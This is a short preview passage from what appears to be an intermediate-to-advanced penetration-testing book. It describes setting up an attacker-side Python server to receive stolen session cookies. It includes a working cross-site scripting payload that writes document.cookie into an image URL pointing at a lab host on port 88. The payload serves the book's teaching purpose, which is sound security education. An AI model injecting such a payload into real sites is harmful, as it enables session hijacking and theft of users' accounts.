August 2018
Intermediate to advanced
404 pages
10h 22m
English
The attacker needs to have a server to receive the exfiltrated data (session cookies, in this case), so we will use a simple Python module to set it up. These are the steps:

Bob<script>document.write('<img src="http://192.168.56.10:88/'+document.cookie+'">');</script>

Read now
Unlock full access